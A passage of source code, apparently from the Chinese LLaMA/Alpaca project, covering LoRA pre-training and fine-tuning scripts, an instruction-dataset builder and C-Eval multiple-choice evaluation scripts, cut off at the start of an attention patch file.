model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, low_cpu_mem_usage=True ) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M 
params") model_vocab_size = model.get_output_embeddings().weight.size(0) if not ( (model_vocab_size==32000 and len(tokenizer)==49953) or \ (model_vocab_size==32000 and len(tokenizer)==32000) or \ (model_vocab_size==49953 and len(tokenizer)==49953) or \ (model_vocab_size==49954 and len(tokenizer)==49954) ): raise ValueError( f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n" "Valid configurations (base model / tokenizer):\n" "- Continue pre-training original LLaMA: 32000 / 32000 \n" "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n" "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n" "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n") model.resize_token_embeddings(len(tokenizer)) if training_args.peft_path is not None: logger.info("Peft from pre-trained model") model = PeftModel.from_pretrained(model, training_args.peft_path) else: logger.info("Init new peft model") target_modules = training_args.trainable.split(',') modules_to_save = training_args.modules_to_save if modules_to_save is not None: modules_to_save = modules_to_save.split(',') lora_rank = training_args.lora_rank lora_dropout = training_args.lora_dropout lora_alpha = training_args.lora_alpha logger.info(f"target_modules: {target_modules}") logger.info(f"lora_rank: {lora_rank}") peft_config = LoraConfig( task_type=TaskType.CAUSAL_LM, target_modules=target_modules, inference_mode=False, r=lora_rank, lora_alpha=lora_alpha, lora_dropout=lora_dropout, modules_to_save=modules_to_save) model = get_peft_model(model, peft_config) model.print_trainable_parameters() old_state_dict = model.state_dict model.state_dict = ( lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict()) ).__get__(model, type(model)) # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset if training_args.do_train else None, eval_dataset=eval_dataset if training_args.do_eval else None, tokenizer=tokenizer, data_collator=fault_tolerance_data_collator, compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available() else None, ) trainer.add_callback(SavePeftModelCallback) # Training if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint train_result = trainer.train(resume_from_checkpoint=checkpoint) metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) if __name__ == "__main__": main() File: 
scripts/training/build_dataset.py import logging import os from dataclasses import dataclass from typing import Dict, Sequence, Union, List import datasets import torch from datasets import load_dataset, concatenate_datasets import transformers IGNORE_INDEX = -100 logger = logging.getLogger('__name__') PROMPT_TEMPLATE = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n{instruction}\n\n### Response: " ) def build_instruction_dataset(data_path: Union[List[str],str], tokenizer: transformers.PreTrainedTokenizer, max_seq_length: int, data_cache_dir = None, preprocessing_num_workers = None, ): def tokenization(examples): sources = [] targets = [] prompt = PROMPT_TEMPLATE for instruction, input, output in zip(examples['instruction'],examples['input'],examples['output']): if input is not None and input !="": instruction = instruction+'\n'+input source = prompt.format_map({'instruction':instruction}) target = f"{output}{tokenizer.eos_token}" sources.append(source) targets.append(target) tokenized_sources = tokenizer(sources,return_attention_mask=False) tokenized_targets = tokenizer(targets,return_attention_mask=False,add_special_tokens=False) all_input_ids = [] all_labels = [] for s,t in zip(tokenized_sources['input_ids'],tokenized_targets['input_ids']): input_ids = torch.LongTensor(s + t)[:max_seq_length] labels = torch.LongTensor([IGNORE_INDEX] * len(s) + t)[:max_seq_length] assert len(input_ids) == len(labels) all_input_ids.append(input_ids) all_labels.append(labels) results = {'input_ids':all_input_ids, 'labels': all_labels} return results logging.warning("building dataset...") all_datasets = [] if not isinstance(data_path,(list,tuple)): data_path = [data_path] for file in data_path: if data_cache_dir is None: data_cache_dir = str(os.path.dirname(file)) cache_path = os.path.join(data_cache_dir,os.path.basename(file).split('.')[0]) os.makedirs(cache_path, exist_ok=True) try: processed_dataset = datasets.load_from_disk(cache_path) logger.info(f'training datasets-{file} has been loaded from disk') except Exception: raw_dataset = load_dataset("json", data_files=file, cache_dir=cache_path) tokenization_func = tokenization tokenized_dataset = raw_dataset.map( tokenization_func, batched=True, num_proc=preprocessing_num_workers, remove_columns=["instruction","input","output"], keep_in_memory=False, desc="preprocessing on dataset", ) processed_dataset = tokenized_dataset processed_dataset.save_to_disk(cache_path) processed_dataset.set_format('torch') all_datasets.append(processed_dataset['train']) all_datasets = concatenate_datasets(all_datasets) return all_datasets @dataclass class DataCollatorForSupervisedDataset(object): """Collate examples for supervised fine-tuning.""" tokenizer: transformers.PreTrainedTokenizer def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]: input_ids, labels = tuple([instance[key] for instance in instances] for key in ("input_ids", "labels")) input_ids = torch.nn.utils.rnn.pad_sequence( input_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id ) labels = torch.nn.utils.rnn.pad_sequence(labels, batch_first=True, padding_value=-100) return dict( input_ids=input_ids, labels=labels, attention_mask=input_ids.ne(self.tokenizer.pad_token_id), ) File: scripts/training/run_clm_sft_with_peft.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. 
# # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. import logging import math import os import sys from dataclasses import dataclass, field from typing import Optional from pathlib import Path import datasets import torch from build_dataset import build_instruction_dataset, DataCollatorForSupervisedDataset import transformers from transformers import ( CONFIG_MAPPING, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM, LlamaTokenizer, AutoTokenizer, HfArgumentParser, Trainer, TrainingArguments, set_seed, ) from transformers.trainer_utils import get_last_checkpoint from transformers.utils import send_example_telemetry from transformers.utils.versions import require_version from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR IGNORE_INDEX = -100 DEFAULT_PAD_TOKEN = "[PAD]" DEFAULT_EOS_TOKEN = "</s>" DEFAULT_BOS_TOKEN = "<s>" DEFAULT_UNK_TOKEN = "<unk>" require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") class SavePeftModelCallback(transformers.TrainerCallback): def save_model(self, args, state, kwargs): if state.best_model_checkpoint is not None: checkpoint_folder = os.path.join(state.best_model_checkpoint, "sft_lora_model") else: checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}") peft_model_path = os.path.join(checkpoint_folder, "sft_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) def on_save(self, args, state, control, **kwargs): self.save_model(args, state, kwargs) return control def on_train_end(self, args, state, control, **kwargs): peft_model_path = os.path.join(args.output_dir, "sft_lora_model") kwargs["model"].save_pretrained(peft_model_path) kwargs["tokenizer"].save_pretrained(peft_model_path) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) tokenizer_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The tokenizer for weights initialization.Don't set if you want to train a model from scratch." ) }, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. 
Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ dataset_dir: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_file: Optional[str] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[float] = field( default=0.05, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) data_cache_dir: Optional[str] = field(default=None, metadata={"help": "The datasets processed stored"}) max_seq_length: Optional[int] = field(default=512) @dataclass class MyTrainingArguments(TrainingArguments): trainable : Optional[str] = field(default="q_proj,v_proj") lora_rank : Optional[int] = field(default=8) lora_dropout : Optional[float] = field(default=0.1) lora_alpha : Optional[float] = field(default=32.) 
modules_to_save : Optional[str] = field(default=None) peft_path : Optional[str] = field(default=None) force_resize_embeddings: bool = field(default=False) logger = logging.getLogger(__name__) def main(): parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments)) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN, handlers=[logging.StreamHandler(sys.stdout)],) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # transformers.tokenization_utils.logging.set_verbosity_warning() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. 
set_seed(training_args.seed) config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.tokenizer_name_or_path: tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) if (len(tokenizer))!=49954: raise ValueError(f"The vocab size of the tokenizer must be 49954, but found {len(tokenizer)}.\n" "Please use Chinese Alpaca tokenizer!") if tokenizer.pad_token is None: print(f"Adding pad token {DEFAULT_PAD_TOKEN}") tokenizer.add_special_tokens(dict(pad_token=DEFAULT_PAD_TOKEN)) data_collator = DataCollatorForSupervisedDataset(tokenizer=tokenizer) eval_dataset=None train_dataset = None if training_args.do_train: with training_args.main_process_first(desc="loading and tokenization"): path = Path(data_args.dataset_dir) files = [os.path.join(path,file.name) for file in path.glob("*.json")] logger.info(f"Training files: {' '.join(files)}") train_dataset = build_instruction_dataset( data_path=files, tokenizer=tokenizer, max_seq_length=data_args.max_seq_length, data_cache_dir = None, preprocessing_num_workers = data_args.preprocessing_num_workers) logger.info(f"Num train_samples {len(train_dataset)}") logger.info("training example:") logger.info(tokenizer.decode(train_dataset[0]['input_ids'])) if training_args.do_eval: with training_args.main_process_first(desc="loading and tokenization"): files = [data_args.validation_file] logger.info(f"Evaluation files: {' '.join(files)}") eval_dataset = build_instruction_dataset( data_path=files, tokenizer=tokenizer, max_seq_length=data_args.max_seq_length, data_cache_dir = None, preprocessing_num_workers = data_args.preprocessing_num_workers) logger.info(f"Num eval_samples {len(eval_dataset)}") logger.info("eval example:") logger.info(tokenizer.decode(eval_dataset[0]['input_ids'])) if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) model = LlamaForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, low_cpu_mem_usage=True ) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): 
p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") logger.info(f"len(tokenizer):{len(tokenizer)}") embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) != embedding_size: logger.info("resize the embedding size by the size of the tokenizer") model.resize_token_embeddings(len(tokenizer)) if training_args.peft_path is not None: logger.info("Peft from pre-trained model") model = PeftModel.from_pretrained(model, training_args.peft_path) else: logger.info("Init new peft model") target_modules = training_args.trainable.split(',') modules_to_save = training_args.modules_to_save if modules_to_save is not None: modules_to_save = modules_to_save.split(',') lora_rank = training_args.lora_rank lora_dropout = training_args.lora_dropout lora_alpha = training_args.lora_alpha logger.info(f"target_modules: {target_modules}") logger.info(f"lora_rank: {lora_rank}") peft_config = LoraConfig( task_type=TaskType.CAUSAL_LM, target_modules=target_modules, inference_mode=False, r=lora_rank, lora_alpha=lora_alpha, lora_dropout=lora_dropout, modules_to_save=modules_to_save) model = get_peft_model(model, peft_config) #model.base_model.tie_weights() model.print_trainable_parameters() logger.info(f"model.modules_to_save: {model.modules_to_save}") old_state_dict = model.state_dict model.state_dict = ( lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict()) ).__get__(model, type(model)) # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset, eval_dataset=eval_dataset, tokenizer=tokenizer, data_collator=data_collator, ) trainer.add_callback(SavePeftModelCallback) # Training if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint train_result = trainer.train(resume_from_checkpoint=checkpoint) metrics = train_result.metrics metrics["train_samples"] = len(train_dataset) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() metrics["eval_samples"] =len(eval_dataset) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) if __name__ == "__main__": main() File: scripts/ceval/llama_evaluator.py # This code is modified from C-Eval Project: https://github.com/SJTU-LIT/ceval import os import re from tqdm import tqdm import random import numpy as np import torch from transformers import LlamaForCausalLM, LlamaTokenizer from evaluator import Evaluator class Llama_Evaluator(Evaluator): def __init__(self, choices, k, model_path, device, temperature=0.2): super(Llama_Evaluator, self).__init__(choices, model_path, k) load_type = torch.float16 self.model_path = model_path self.device = device self.tokenizer = LlamaTokenizer.from_pretrained(model_path) self.model = LlamaForCausalLM.from_pretrained( model_path, load_in_8bit=False, torch_dtype=load_type, low_cpu_mem_usage=True, device_map='auto') self.generation_config = dict( temperature=temperature, top_k=40, top_p=0.9, do_sample=True, num_beams=1, repetition_penalty=1.1, max_new_tokens=20 ) self.sA_id = self.tokenizer.encode("A", add_special_tokens=False)[0] self.sB_id 
= self.tokenizer.encode("B", add_special_tokens=False)[0] self.sC_id = self.tokenizer.encode("C", add_special_tokens=False)[0] self.sD_id = self.tokenizer.encode("D", add_special_tokens=False)[0] self.A_id = self.tokenizer.encode(":A")[-1] self.B_id = self.tokenizer.encode(":B")[-1] self.C_id = self.tokenizer.encode(":C")[-1] self.D_id = self.tokenizer.encode(":D")[-1] def eval_subject(self, subject_name, test_df, dev_df=None, few_shot=False, cot=False, save_result_dir=None, with_prompt=False, constrained_decoding=False, do_test=False): all_answers = {} if constrained_decoding is True: self.generation_config['output_scores'] = True self.generation_config['return_dict_in_generate'] = True self.generation_config['max_new_tokens'] = 1 self.generation_config['top_p'] = 1.0 self.generation_config['top_k'] = 0 correct_num = 0 if save_result_dir: result = [] score = [] if few_shot: history = self.generate_few_shot_prompt(subject_name, dev_df, cot=cot) else: history = '' answers = ['NA'] * len(test_df) if do_test is True else list(test_df['answer']) for row_index, row in tqdm(test_df.iterrows(), total=len(test_df)): question = self.format_example(row, include_answer=False, cot=cot,with_prompt=with_prompt) instruction = history + question if with_prompt: prompt_template = ( "Below is an instruction that describes a task. " "Write a response that appropriately completes the request.\n\n" "### Instruction:\n{instruction}\n\n### Response: ") instruction = prompt_template.format_map({'instruction': instruction,'subject':subject_name}) inputs = self.tokenizer(instruction, return_tensors="pt") generation_output = self.model.generate( input_ids = inputs["input_ids"].to(self.device), attention_mask = inputs['attention_mask'].to(self.device), eos_token_id=self.tokenizer.eos_token_id, pad_token_id=self.tokenizer.pad_token_id, **self.generation_config ) batch_size, length = inputs.input_ids.shape if constrained_decoding is True: logits = generation_output.scores[0][0] logits = logits.float().cpu().detach() choices1_logits = logits[[self.sA_id,self.sB_id,self.sC_id,self.sD_id]] choices2_logits = logits[[self.A_id,self.B_id,self.C_id,self.D_id]] choicesAll_logits = (choices1_logits + choices2_logits).numpy() assert not (np.any(np.isinf(choicesAll_logits)) or np.any(np.isnan(choicesAll_logits))) ans = {0: "A", 1: "B", 2: "C", 3: "D"}[np.argmax(choicesAll_logits)] response = self.tokenizer.decode([logits.argmax(-1).item()]) else: response = self.tokenizer.decode(generation_output[0, length:], skip_special_tokens=True) ans, direct_extract = self.extract_answer(row, response) if ans == answers[row_index]: correct_num += 1 correct = 1 else: correct = 0 print(f"\n=======begin {str(row_index)}=======") print("question: ", question) print("response: ", response) print("ans: ", ans) print("ground truth: ", answers[row_index], "\n") if save_result_dir: result.append(response) score.append(correct) print(f"=======end {str(row_index)}=======") all_answers[str(row_index)] = ans correct_ratio = 100*correct_num/len(answers) if save_result_dir: test_df['model_output'] = result test_df['correctness'] = score test_df.to_csv(os.path.join(save_result_dir, f'{subject_name}_test.csv')) return correct_ratio, all_answers def format_example(self, line, include_answer=True, cot=False, with_prompt=False): example = line['question'] for choice in self.choices: example += f'\n{choice}. 
{line[f"{choice}"]}' if include_answer: if cot: example += "\n答案:让我们一步一步思考,\n" + \ line["explanation"] + f"\n所以答案是{line['answer']}。\n\n" else: example += '\n答案:' + line["answer"] + '\n\n' else: if with_prompt is False: if cot: example += "\n答案:让我们一步一步思考,\n1." else: example += '\n答案:' else: if cot: example += "\n答案是什么?让我们一步一步思考,\n1." else: example += '\n答案是什么? ' return example def generate_few_shot_prompt(self, subject, dev_df, cot=False): prompt = f"以下是中国关于{subject}考试的单项选择题,请选出其中的正确答案。\n\n" k = self.k if self.k == -1: k = dev_df.shape[0] for i in range(k): prompt += self.format_example( dev_df.iloc[i, :], include_answer=True, cot=cot ) return prompt def extract_answer(self, line, gen_ans): m = re.findall(r'所以答案是(.+?)。', gen_ans, re.M) if len(m) > 0 and m[-1] in self.choices: return m[-1], True answer_patterns = [ r'([ABCD])是正确的', r'选项([ABCD])正确', r'答案为([ABCD])', r'答案是([ABCD])', r'答案([ABCD])', r'选择([ABCD])', r'答案:([ABCD])', r'选择答案([ABCD])' ] # RE extraction for answer_pattern in answer_patterns: m = re.search(answer_pattern, gen_ans, re.M) if m: answer = m.group(1) return answer, False # only containing one choice-character m = re.findall(r'[ABCD]', gen_ans, re.M) if len(m) >= 1: answer = m[0] return answer, False # only containing one choice-context choices_dict = {} pattern = "" for c in self.choices: choices_dict[str(line[f'{c}'])] = c pattern += re.escape(str(line[f'{c}']))+"|" pattern = pattern[:-1] m = re.findall(pattern, gen_ans, re.M) print("w/ escape:",repr(pattern),gen_ans,(len(m)>=1)) if len(m) >= 1: answer = choices_dict[m[0]] return answer, False return random.choice('ABCD'), False File: scripts/ceval/eval.py # This code is modified from C-Eval Project: https://github.com/SJTU-LIT/ceval import os import argparse import pandas as pd import torch import json from llama_evaluator import Llama_Evaluator import time choices = ["A", "B", "C", "D"] def main(args, evaluator,take): assert os.path.exists("subject_mapping.json"), "subject_mapping.json not found!" 
with open("subject_mapping.json") as f: subject_mapping = json.load(f) filenames = os.listdir("data/val") subject_list = [val_file.replace("_val.csv","") for val_file in filenames] accuracy, summary = {}, {} run_date=time.strftime('%Y-%m-%d_%H-%M-%S',time.localtime(time.time())) output_dir = args.output_dir save_result_dir=os.path.join(output_dir,f"take{take}") if not os.path.exists(save_result_dir): os.makedirs(save_result_dir,exist_ok=True) all_answers = {} for index,subject_name in enumerate(subject_list): print(f"{index/len(subject_list)} Inference starts at {run_date} on {args.model_path} with subject of {subject_name}!") val_file_path=os.path.join('data/val',f'{subject_name}_val.csv') dev_file_path=os.path.join('data/dev',f'{subject_name}_dev.csv') test_file_path=os.path.join('data/test',f'{subject_name}_test.csv') val_df=pd.read_csv(val_file_path) if args.do_test is False else pd.read_csv(test_file_path) dev_df=pd.read_csv(dev_file_path) if args.few_shot else None correct_ratio, answers = evaluator.eval_subject(subject_name, val_df, dev_df, save_result_dir=save_result_dir if args.do_save_csv else None, few_shot=args.few_shot, cot=args.cot, with_prompt=args.with_prompt, constrained_decoding=args.constrained_decoding, do_test=args.do_test) print(f"Subject: {subject_name}") print(f"Acc: {correct_ratio}") accuracy[subject_name] = correct_ratio summary[subject_name] = {"score":correct_ratio, "num":len(val_df), "correct":correct_ratio*len(val_df)/100} all_answers[subject_name] = answers json.dump(all_answers,open(save_result_dir+'/submission.json','w'),ensure_ascii=False,indent=4) print("Accuracy:") for k, v in accuracy.items(): print(k, ": ", v) total_num = 0 total_correct = 0 summary['grouped'] = { "STEM": {"correct": 0.0, "num": 0}, "Social Science": {"correct": 0.0, "num": 0}, "Humanities": {"correct": 0.0, "num": 0}, "Other": {"correct": 0.0, "num": 0} } for subj, info in subject_mapping.items(): group = info[2] summary['grouped'][group]["num"] += summary[subj]['num'] summary['grouped'][group]["correct"] += summary[subj]['correct'] for group, info in summary['grouped'].items(): info['score'] = info["correct"] / info["num"] total_num += info["num"] total_correct += info["correct"] summary['All'] = {"score": total_correct / total_num, "num": total_num, "correct": total_correct} json.dump(summary,open(save_result_dir+'/summary.json','w'),ensure_ascii=False,indent=2) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--model_path", type=str) parser.add_argument("--cot",choices=["False","True"], default="False") parser.add_argument("--few_shot", choices=["False","True"], default="True") parser.add_argument("--ntrain", "-k", type=int, default=5) parser.add_argument("--with_prompt", choices=["False","True"], default="False") parser.add_argument("--constrained_decoding", choices=["False","True"], default="True") parser.add_argument("--temperature",type=float,default=0.2) parser.add_argument("--n_times", default=1,type=int) parser.add_argument("--do_save_csv", choices=["False","True"], default="False") parser.add_argument("--output_dir", type=str) parser.add_argument("--do_test", choices=["False","True"], default="False") args = parser.parse_args() args.cot = args.cot == "True" args.few_shot = args.few_shot == "True" args.with_prompt = args.with_prompt == "True" args.constrained_decoding = args.constrained_decoding == "True" args.do_test = args.do_test == "True" args.do_save_csv = args.do_save_csv == "True" if args.constrained_decoding is True: 
args.n_times=max(args.n_times,1) print(args) device = torch.device(0) print(device) evaluator=Llama_Evaluator( choices=choices, k=args.ntrain, model_path=args.model_path, device=device, temperature = args.temperature ) for i in range(args.n_times): main(args,evaluator=evaluator,take=i) File: scripts/ceval/evaluator.py # This code is modified from C-Eval Project: https://github.com/SJTU-LIT/ceval import string class Evaluator: def __init__(self, choices, model_name, k=-1): self.choices = choices self.model_name = model_name self.k = k self.puncs = list(string.punctuation) def format_example(self, line, include_answer=True): example = line['question'] for choice in self.choices: example += f'\n{choice}. {line[f"{choice}"]}' example += '\n答案:' if include_answer: example += f'{line["answer"]}\n\n' return example def generate_few_shot_prompt(self, subject, dev_df): prompt = f"以下是中国关于{subject}考试的单项选择题,请选出其中的正确答案。\n\n" k = self.k if self.k == -1: k = dev_df.shape[0] for i in range(k): prompt += self.format_example(dev_df.iloc[i, :]) return prompt def eval_subject(self, subject_name, test_df, dev_df=None, few_shot=False, save_result_dir=None): pass def normalize_answer(self,s): def white_space_fix(text): return ' '.join(text.split()) def remove_punc(text): exclude=set(self.puncs) return ''.join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_punc(lower(s))) def exact_match(self,pred, target): return self.normalize_answer(pred)==self.normalize_answer(target) File: scripts/openai_server_demo/patches.py import torch from torch import nn from typing import Optional, Tuple, Union import transformers from transformers.models.llama.modeling_llama import apply_rotary_pos_emb, rotate_half import math try: from xformers import ops as xops except ImportError: xops = None print( "Xformers is not installed correctly. If you want to use memory_efficient_attention use the following command to install Xformers\npip install xformers." ) STORE_KV_BEFORE_ROPE = False USE_MEM_EFF_ATTENTION = False ALPHA = 1.0 def apply_rotary_pos_emb_single(q, cos, sin, position_ids): # The first two dimensions of cos and sin are always 1, so we can `squeeze` them. 
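    # This single-tensor variant applies RoPE to one tensor at a time; it is used in the
    # STORE_KV_BEFORE_ROPE code path below, where queries and cached keys are rotated
    # separately with their own position ids.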
